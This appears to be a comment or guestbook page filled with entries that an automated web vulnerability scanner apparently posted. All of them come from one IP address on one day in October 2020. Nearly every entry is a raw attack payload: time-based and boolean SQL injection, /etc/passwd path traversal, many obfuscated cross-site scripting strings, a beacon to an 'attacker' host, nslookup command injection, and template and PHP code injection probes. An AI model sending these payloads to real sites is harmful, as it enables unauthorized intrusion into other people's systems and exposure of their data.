e [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 22:29:41

1

e [%2fetc%2fpasswd] 2020-10-28 22:29:41

1

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 22:29:40

1

e [${9999236+10000478}] 2020-10-28 22:29:39

1

e [/etc/passwd] 2020-10-28 22:29:39

1

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 22:29:39

1

e [116.113.93.82] 2020-10-28 22:29:38

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 22:29:38

1

e [116.113.93.82] 2020-10-28 22:29:38

"+response.write(9755699*9173278)+"

e [-1" OR 2+459-459-1=0+0+0+1 -- ] 2020-10-28 22:29:38

1

e [116.113.93.82] 2020-10-28 22:29:37

&nslookup ZyOnhYrN&'\"`0&nslookup ZyOnhYrN&`'

e [116.113.93.82] 2020-10-28 22:29:37

'+response.write(9755699*9173278)+'

e [116.113.93.82] 2020-10-28 22:29:37

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 22:29:37

1

e [-1' OR 2+121-121-1=0+0+0+1 or 'VW56Sfwz'='] 2020-10-28 22:29:37

1

e [116.113.93.82] 2020-10-28 22:29:37

$(nslookup 0mLaf0jn)

e [116.113.93.82<X6vc7v<] 2020-10-28 22:29:36

1

e [116.113.93.82] 2020-10-28 22:29:36

response.write(9755699*9173278)

e [Array] 2020-10-28 22:29:36

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 22:29:36

1

e [-1' OR 2+641-641-1=0+0+0+1 -- ] 2020-10-28 22:29:36

1

e [116.113.93.82] 2020-10-28 22:29:36

set|set&set

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 22:29:36

1

e [Array] 2020-10-28 22:29:35

1

e [-1 OR 2+107-107-1=0+0+0+1] 2020-10-28 22:29:35

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 22:29:35

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 22:29:34

1

e [12345'"\'\");|]*{ <>] 2020-10-28 22:29:34

1

e [116.113.93.82<img sRc='http://attacker-9340/log.php?] 2020-10-28 22:29:33

1

e [116.113.93.82] 2020-10-28 22:29:33

yN3v9q4Y

e [-1 OR 2+350-350-1=0+0+0+1 -- ] 2020-10-28 22:29:33

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 22:29:33

1

e [] 2020-10-28 22:29:33

1

e ["+response.write(9676656*9674813)+"] 2020-10-28 22:29:32

1

e [BltEzgpf] 2020-10-28 22:29:32

1

e [&nslookup Cwv9pQlV&'\"`0&nslookup Cwv9pQlV&`'] 2020-10-28 22:29:32

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 22:29:32

1

e ['+response.write(9676656*9674813)+'] 2020-10-28 22:29:31

1

e [iOyVxCoQ] 2020-10-28 22:29:31

1

e [116.113.93.82] 2020-10-28 22:29:31

1

e [$(nslookup e56hqzzn)] 2020-10-28 22:29:31

1

e [116.113.93.82<NbZeHh x=9638>] 2020-10-28 22:29:30

1

e [response.write(9676656*9674813)] 2020-10-28 22:29:30

1

e [set|set&set] 2020-10-28 22:29:30

1

e [116.113.93.82] 2020-10-28 22:29:30

1

e [116.113.93.82<ifRAme sRc=9101.com></IfRamE>] 2020-10-28 22:29:27

1

e [116.113.93.82<WO1SBV>MOCAI[!+!]</WO1SBV>] 2020-10-28 22:29:22

1

e [116.113.93.821Usae <ScRiPt >Cj7v(9603)</ScRiPt>] 2020-10-28 22:29:18

1

e [116.113.93.82<% contenteditable onresize=Cj7v(9737)>] 2020-10-28 22:29:16

1

e [116.113.93.82}body{acu:Expre/**/SSion(Cj7v(9368))}] 2020-10-28 22:29:13

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9595);//><!-- -->] 2020-10-28 22:29:09

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 22:29:07

1

e [116.113.93.82] 2020-10-28 22:29:01

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 22:29:00

1

e [116.113.93.82] 2020-10-28 22:28:57

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 22:28:56

1

e [116.113.93.82] 2020-10-28 22:28:54

1

e [116.113.93.82] 2020-10-28 22:28:53

1

e [116.113.93.82<input autofocus onfocus=Cj7v(9337)>] 2020-10-28 22:28:53

1

e [116.113.93.82] 2020-10-28 22:28:52

1

e [116.113.93.82] 2020-10-28 22:28:51

1

e [116.113.93.82] 2020-10-28 22:28:51

1

e [116.113.93.82] 2020-10-28 22:28:50

1

e [] 2020-10-28 22:28:49

1

e [116.113.93.82] 2020-10-28 22:28:48

1

e [116.113.93.82] 2020-10-28 22:28:46

1

e [116.113.93.82<ScRiPt>Cj7v(9519)</sCripT>] 2020-10-28 22:28:46

1

e [116.113.93.82] 2020-10-28 22:28:46

1

e [116.113.93.82] 2020-10-28 22:28:42

1

e [116.113.93.82] 2020-10-28 22:28:41

1

e [116.113.93.82\u003CScRiPt\Cj7v(9099)\u003C/sCripT\u003E] 2020-10-28 22:28:39

1

e [116.113.93.82] 2020-10-28 22:28:39

1

e [116.113.93.82] 2020-10-28 22:28:38

1

e [116.113.93.82] 2020-10-28 22:28:37

1

e [116.113.93.82] 2020-10-28 22:28:37

1

e [116.113.93.82] 2020-10-28 22:28:37

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%43%6A%37%76%289116%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 22:28:37

1

e [116.113.93.82] 2020-10-28 22:28:37

1

e [116.113.93.82] 2020-10-28 22:28:36

1

e [116.113.93.82] 2020-10-28 22:28:35

1

e [116.113.93.82] 2020-10-28 22:28:35

1

e [116.113.93.82<img/src=">" onerror=alert(9238)>] 2020-10-28 22:28:34

1

e [116.113.93.82] 2020-10-28 22:28:34

1

e [116.113.93.82] 2020-10-28 22:28:32

1

e [116.113.93.82] 2020-10-28 22:28:32

1

e [116.113.93.82] 2020-10-28 22:28:31

1

e [116.113.93.82<img src=xyz OnErRor=Cj7v(9107)>] 2020-10-28 22:28:31

1

e [116.113.93.82] 2020-10-28 22:28:31

1

e [116.113.93.82] 2020-10-28 22:28:30

1

e [116.113.93.82] 2020-10-28 22:28:30

1

e [116.113.93.82] 2020-10-28 22:28:28

1

e [116.113.93.82] 2020-10-28 22:28:28

1

e [116.113.93.82] 2020-10-28 22:28:27

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=Cj7v(9365)>] 2020-10-28 22:28:26

1

e [116.113.93.82] 2020-10-28 22:28:26

1

e [116.113.93.82] 2020-10-28 22:28:26

1

e [116.113.93.82] 2020-10-28 22:28:25

1

e [116.113.93.82] 2020-10-28 22:28:24

1

e [116.113.93.82<body onload=Cj7v(9726)>] 2020-10-28 22:28:24

1

e [116.113.93.82] 2020-10-28 22:28:23

1

e [116.113.93.82] 2020-10-28 22:28:22

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9823'>] 2020-10-28 22:28:21

1

e [116.113.93.82] 2020-10-28 22:28:20

1

e [116.113.93.82] 2020-10-28 22:28:19

1

e [116.113.93.82] 2020-10-28 22:28:18

1

e [116.113.93.82<isindex type=image src=1 onerror=Cj7v(9062)>] 2020-10-28 22:28:17

1

e [116.113.93.82] 2020-10-28 22:28:17

1

e [116.113.93.82] 2020-10-28 22:28:16

1

e [116.113.93.82] 2020-10-28 22:28:15

1

e [116.113.93.82<svg ] 2020-10-28 22:28:15

1

e [116.113.93.82<video><source onerror="javascript:Cj7v(9018)">] 2020-10-28 22:28:10

1

e [116.113.93.82<ScRiPt >Cj7v(9254)</ScRiPt>] 2020-10-28 22:28:07

1

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9979></ScRiPt>] 2020-10-28 22:28:04

1

e [116.113.93.82<ScRiPt >Cj7v(9479)</ScRiPt>] 2020-10-28 22:28:00

1

e [116.113.93.82] 2020-10-28 22:27:56

1

e [116.113.93.82<ScR<ScRiPt>IpT>Cj7v(9450)</sCr<ScRiPt>IpT>] 2020-10-28 22:27:56

1

e [116.113.93.82] 2020-10-28 22:27:56

1

e [116.113.93.82] 2020-10-28 22:27:55

1

e [116.113.93.82] 2020-10-28 22:27:54

9oolAmWU'));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:27:53

2NPypVIj');select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:27:53

1

e [116.113.93.82<script>Cj7v(9262)</script>] 2020-10-28 22:27:53

1

e [116.113.93.82] 2020-10-28 22:27:52

1

e [116.113.93.82] 2020-10-28 22:27:51

WHSnwi6t';select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:27:51

1

e [116.113.93.82] 2020-10-28 22:27:50

-1));select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:27:50

WEB-INF\web.xml

e [116.113.93.82<WMMVRE>ILYQC[!+!]</WMMVRE>] 2020-10-28 22:27:50

1

e [116.113.93.82] 2020-10-28 22:27:48

1

e [116.113.93.82] 2020-10-28 22:27:48

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:27:48

-1);select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:27:47

-1;select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:27:47

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:27:46

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 22:27:46

uRuhLdAk'; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:27:45

1 waitfor delay '0:0:6' --

e [116.113.93.82<ScRiPt >Cj7v(9129)</ScRiPt>] 2020-10-28 22:27:44

1

e [116.113.93.82] 2020-10-28 22:27:44

file:///etc/passwd

e [116.113.93.82] 2020-10-28 22:27:44

-1); waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:27:43

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 22:27:43

-1; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:27:42

..

e [116.113.93.82] 2020-10-28 22:27:42

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

e [{{9999813*9999107}}] 2020-10-28 22:27:41

1

e [116.113.93.82] 2020-10-28 22:27:40

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

e [116.113.93.82] 2020-10-28 22:27:40

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 22:27:39

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 22:27:39

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

e [116.113.93.82] 2020-10-28 22:27:38

if(now()=sysdate(),sleep(9),0)

e [116.113.93.82] 2020-10-28 22:27:38

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 22:27:37

e [116.113.93.82] 2020-10-28 22:27:37

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 22:27:36

e [116.113.93.82] 2020-10-28 22:27:36

-1" OR 2+360-360-1=0+0+0+1 --

e [acux2890] 2020-10-28 22:27:36

1

e [116.113.93.82] 2020-10-28 22:27:35

/etc/passwd

e [116.113.93.82] 2020-10-28 22:27:35

-1' OR 2+415-415-1=0+0+0+1 or '0fswNxXF'='

e [116.113.93.82] 2020-10-28 22:27:34

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 22:27:33

JyI=

e [116.113.93.82] 2020-10-28 22:27:33

-1' OR 2+374-374-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:27:32

@@G0OWK

e [116.113.93.82] 2020-10-28 22:27:32

-1 OR 2+693-693-1=0+0+0+1

e [116.113.93.82] 2020-10-28 22:27:32

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:27:31

1

e [116.113.93.82] 2020-10-28 22:27:31

-1 OR 2+966-966-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:27:30

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 22:27:30

\

e [116.113.93.82] 2020-10-28 22:27:30

zg4oUq4d

e [116.113.93.82] 2020-10-28 22:27:29

../../../../../../../../../../etc/passwd.jpg

e [acu2285<s1﹥s2ʺs3ʹuca2285] 2020-10-28 22:27:29

1

e [116.113.93.82] 2020-10-28 22:27:29

1'"

e [116.113.93.82] 2020-10-28 22:27:29

1

e [116.113.93.82] 2020-10-28 22:27:28

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 22:27:27

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 22:27:26

1

e [116.113.93.82] 2020-10-28 22:27:26

../../../../../../../../../../etc/passwd

e [116.113.93.829761739] 2020-10-28 22:27:25

1

e [116.113.93.82] 2020-10-28 22:27:25

1

e [116.113.93.82] 2020-10-28 22:27:24

1

e [116.113.93.82] 2020-10-28 22:27:23

1

e [116.113.93.82] 2020-10-28 22:27:23

1

e [116.113.93.82] 2020-10-28 22:27:23

1

e [116.113.93.82] 2020-10-28 22:27:22

1

e ['"()&%<acx><ScRiPt >Cj7v(9435)</ScRiPt>] 2020-10-28 22:27:21

1

e [116.113.93.82] 2020-10-28 22:27:20

1

e [116.113.93.82] 2020-10-28 22:27:20

1

e [116.113.93.82] 2020-10-28 22:27:19

1

e [116.113.93.82] 2020-10-28 22:27:18

1

e [116.113.93.82] 2020-10-28 22:27:17

<!--

e [] 2020-10-28 22:27:17

1

e [116.113.93.82] 2020-10-28 22:27:17

'"

e [116.113.93.82] 2020-10-28 22:27:16

1

e [116.113.93.82] 2020-10-28 22:27:16

1

e [116.113.93.82'"()&%<acx><ScRiPt >Cj7v(9899)</ScRiPt>] 2020-10-28 22:27:16

1

e [] 2020-10-28 22:27:16

1

e [116.113.93.82] 2020-10-28 22:27:15

1

e [116.113.93.82] 2020-10-28 22:27:15

1

e [116.113.93.82] 2020-10-28 22:27:14

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 22:27:14

1

e [116.113.93.82] 2020-10-28 22:27:14

create/.

e [<!--] 2020-10-28 22:27:13

1

e [116.113.93.82] 2020-10-28 22:27:13

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [JyI=] 2020-10-28 22:27:13

1

e [116.113.93.82] 2020-10-28 22:27:13

1

e [116.113.93.82] 2020-10-28 22:27:13

create

e [@@kPbzM] 2020-10-28 22:27:12

1

e ['"] 2020-10-28 22:27:12

1

e [116.113.93.82] 2020-10-28 22:27:12

create

e [/www.vulnweb.com] 2020-10-28 22:27:11

1

e [116.113.93.82] 2020-10-28 22:27:11

http://hitxWiKHcfusk.bxss.me/

e [116.113.93.82] 2020-10-28 22:27:11

${@print(md5(acunetix_wvs_security_test))}\

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 22:27:11

1

e [116.113.93.82] 2020-10-28 22:27:10

1

e [116.113.93.82] 2020-10-28 22:27:10

1

e [116.113.93.82] 2020-10-28 22:27:10

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 22:27:10

1

e [1] 2020-10-28 22:27:09

1

e [116.113.93.82] 2020-10-28 22:27:09

1

e [116.113.93.82] 2020-10-28 22:27:09

";print(md5(acunetix_wvs_security_test));$a="

e [116.113.93.82] 2020-10-28 22:27:08

1

e [116.113.93.82] 2020-10-28 22:27:08

1

e [\] 2020-10-28 22:27:08

1

e [116.113.93.82] 2020-10-28 22:27:07

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82] 2020-10-28 22:27:07

1

e [1'"] 2020-10-28 22:27:07

1

e [116.113.93.82] 2020-10-28 22:27:07

;print(md5(acunetix_wvs_security_test));

e [http://hitlidiCTOm2s.bxss.me/] 2020-10-28 22:27:07

1

e [116.113.93.82] 2020-10-28 22:27:07

1

e [create/.] 2020-10-28 22:27:07

1

e [116.113.93.82] 2020-10-28 22:27:06

1

e [create] 2020-10-28 22:27:06

1

e [116.113.93.82] 2020-10-28 22:27:05

1

e [116.113.93.82] 2020-10-28 22:27:05

1

e [create] 2020-10-28 22:27:05

1

e [116.113.93.82] 2020-10-28 22:27:05

^(#$!@#$)(()))******

e [116.113.93.82] 2020-10-28 22:27:04

1

e [116.113.93.82] 2020-10-28 22:27:02

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 22:27:02

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 22:27:02

1

e [116.113.93.82] 2020-10-28 22:27:01

1

e [116.113.93.82] 2020-10-28 22:27:01

)

e [116.113.93.82] 2020-10-28 22:27:01

'"()

e [KDewCuiF'));select pg_sleep(3); -- ] 2020-10-28 22:27:01

1

e [116.113.93.82] 2020-10-28 22:27:00

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 22:27:00

testasp.vulnweb.com

e [KJBfNLHA');select pg_sleep(3); -- ] 2020-10-28 22:27:00

1

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 22:26:59

1

e [WEB-INF\web.xml] 2020-10-28 22:26:59

1

e [116.113.93.82] 2020-10-28 22:26:59

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [nr8ZSyPK';select pg_sleep(3); -- ] 2020-10-28 22:26:59

1

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 22:26:58

1

e [116.113.93.82] 2020-10-28 22:26:58

1

e [WEB-INF/web.xml] 2020-10-28 22:26:58

1

e [116.113.93.82] 2020-10-28 22:26:58

Http://testasp.vulnweb.com/t/fit.txt

e [azJjNUhl'; waitfor delay '0:0:3' -- ] 2020-10-28 22:26:57

1

e [116.113.93.82] 2020-10-28 22:26:57

Array

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 22:26:57

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:26:57

1

e [/WEB-INF/web.xml] 2020-10-28 22:26:57

1

e [116.113.93.82] 2020-10-28 22:26:57

Array

e [1 waitfor delay '0:0:9' -- ] 2020-10-28 22:26:57

1

e [116.113.93.82] 2020-10-28 22:26:57

1some_inexistent_file_with_long_name.jpg

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:26:56

1

e [116.113.93.82] 2020-10-28 22:26:56

Array

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 22:26:56

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 22:26:56

1

e [116.113.93.82] 2020-10-28 22:26:56

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [^(#$!@#$)(()))******] 2020-10-28 22:26:56

1

e [116.113.93.82] 2020-10-28 22:26:56

1

e [file:///etc/passwd] 2020-10-28 22:26:56

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 22:26:55

1

e [116.113.93.82] 2020-10-28 22:26:55

1

e [!(()&&!|*|*|] 2020-10-28 22:26:55

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 22:26:54

1

e [116.113.93.82] 2020-10-28 22:26:54

1

e [116.113.93.82] 2020-10-28 22:26:54

1

e [..] 2020-10-28 22:26:53

1

e ['"()] 2020-10-28 22:26:53

1

e [116.113.93.82] 2020-10-28 22:26:53

1

e [116.113.93.82] 2020-10-28 22:26:53

1&n983779=v969447

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 22:26:53

1

e [116.113.93.82] 2020-10-28 22:26:53

12345'"\'\");|]*{ <>

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 22:26:52

1

e [Array] 2020-10-28 22:26:52

1

e [)] 2020-10-28 22:26:52

1

e [116.113.93.82] 2020-10-28 22:26:52

1

e [116.113.93.82] 2020-10-28 22:26:52

e [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 22:26:52

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 22:26:51

1

e [116.113.93.82] 2020-10-28 22:26:51

1

e [116.113.93.82] 2020-10-28 22:26:51

1

e [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 22:26:50

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 22:26:50

1

e [testasp.vulnweb.com] 2020-10-28 22:26:50

1

e [116.113.93.82] 2020-10-28 22:26:50

&nslookup zeHPVMq2&'\"`0&nslookup zeHPVMq2&`'

e [116.113.93.82] 2020-10-28 22:26:50

1

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 22:26:49

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 22:26:49

1

e [%2fetc%2fpasswd] 2020-10-28 22:26:49

1

e [116.113.93.82] 2020-10-28 22:26:49

${9999144+10000130}

e [116.113.93.82] 2020-10-28 22:26:48

$(nslookup eu9w3Dsu)

e [-1" OR 2+525-525-1=0+0+0+1 -- ] 2020-10-28 22:26:48

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 22:26:48

1

e [116.113.93.82] 2020-10-28 22:26:48

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [/etc/passwd] 2020-10-28 22:26:48

1

e [116.113.93.82] 2020-10-28 22:26:47

"+response.write(9200778*9159852)+"

e [116.113.93.82&n963480=v947795] 2020-10-28 22:26:47

1

e [-1' OR 2+184-184-1=0+0+0+1 or 'E8Dcj8dm'='] 2020-10-28 22:26:47

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 22:26:47

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 22:26:47

1

e [116.113.93.82] 2020-10-28 22:26:47

set|set&set

e [116.113.93.82] 2020-10-28 22:26:47

'+response.write(9200778*9159852)+'

e [-1' OR 2+394-394-1=0+0+0+1 -- ] 2020-10-28 22:26:46

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 22:26:46

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 22:26:46

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 22:26:46

1

e [116.113.93.82] 2020-10-28 22:26:46

response.write(9200778*9159852)

e [${10000227+9999060}] 2020-10-28 22:26:46

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 22:26:45

1

e [-1 OR 2+245-245-1=0+0+0+1] 2020-10-28 22:26:44

1

e [Array] 2020-10-28 22:26:44

1

e [116.113.93.82] 2020-10-28 22:26:44

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 22:26:44

1

e [-1 OR 2+288-288-1=0+0+0+1 -- ] 2020-10-28 22:26:43

1

e [Array] 2020-10-28 22:26:43

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 22:26:43

1

e [12345'"\'\");|]*{ <>] 2020-10-28 22:26:42

1

e [LOaaQg8O] 2020-10-28 22:26:42

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 22:26:42

1

e [116.113.93.82] 2020-10-28 22:26:42

6bjmfn0E

e [&nslookup WKqeOH0l&'\"`0&nslookup WKqeOH0l&`'] 2020-10-28 22:26:41

1

e [] 2020-10-28 22:26:41

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 22:26:41

1

e [116.113.93.82] 2020-10-28 22:26:41

1

e ["+response.write(9441164*9082530)+"] 2020-10-28 22:26:40

1

e [$(nslookup PRrCXwLR)] 2020-10-28 22:26:40

1

e [NR3AvRjx] 2020-10-28 22:26:39

1

e [set|set&set] 2020-10-28 22:26:39

1

e ['+response.write(9441164*9082530)+'] 2020-10-28 22:26:39

1

e [116.113.93.82] 2020-10-28 22:26:38

1

e [response.write(9441164*9082530)] 2020-10-28 22:26:37

1

e [116.113.93.82] 2020-10-28 22:25:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:04:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:04:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:04:18

1

GRLpGpAG"><script>U7Ix(9851)</script> [116.113.93.82] 2020-10-28 19:04:15

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(U7Ix(9436))'bad=" [116.113.93.82] 2020-10-28 19:04:12

1

[116.113.93.82] 2020-10-28 19:04:10

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%55%37%49%78%28%39%31%31%35%29%22 [116.113.93.82] 2020-10-28 19:04:07

1

GRLpGpAG\u0022onmouseover=U7Ix(9777)\u0022 [116.113.93.82] 2020-10-28 19:04:04

1

GRLpGpAG" iABn=U7Ix([!+!]) 1zp=" [116.113.93.82] 2020-10-28 19:04:01

1

GRLpGpAG"onmouseover=U7Ix(9736)" [116.113.93.82] 2020-10-28 19:03:59

1

GRLpGpAG<3UpW6Q< [116.113.93.82] 2020-10-28 19:03:56

1

GRLpGpAG<img sRc='http://attacker-9176/log.php? [116.113.93.82] 2020-10-28 19:03:53

1

GRLpGpAG<aqvr4R x=9285> [116.113.93.82] 2020-10-28 19:03:50

1

GRLpGpAG<ifRAme sRc=9029.com></IfRamE> [116.113.93.82] 2020-10-28 19:03:48

1

GRLpGpAG<WZD4T2>YXIGL[!+!]</WZD4T2> [116.113.93.82] 2020-10-28 19:03:45

1

GRLpGpAGxyxa1 <ScRiPt >U7Ix(9968)</ScRiPt> [116.113.93.82] 2020-10-28 19:03:42

1

GRLpGpAG<% contenteditable onresize=U7Ix(9009)> [116.113.93.82] 2020-10-28 19:03:39

1

GRLpGpAG}body{acu:Expre/**/SSion(U7Ix(9000))} [116.113.93.82] 2020-10-28 19:03:37

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9481);//><!-- --> [116.113.93.82] 2020-10-28 19:03:34

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 19:03:31

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 19:03:29

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 19:03:25

1

GRLpGpAG<input autofocus onfocus=U7Ix(9933)> [116.113.93.82] 2020-10-28 19:03:22

1

[116.113.93.82] 2020-10-28 19:03:19

1

GRLpGpAG<ScRiPt>U7Ix(9930)</sCripT> [116.113.93.82] 2020-10-28 19:03:16

1

GRLpGpAG\u003CScRiPt\U7Ix(9223)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 19:03:13

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%55%37%49%78%289815%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 19:03:10

1

GRLpGpAG<img/src=">" onerror=alert(9724)> [116.113.93.82] 2020-10-28 19:03:07

1

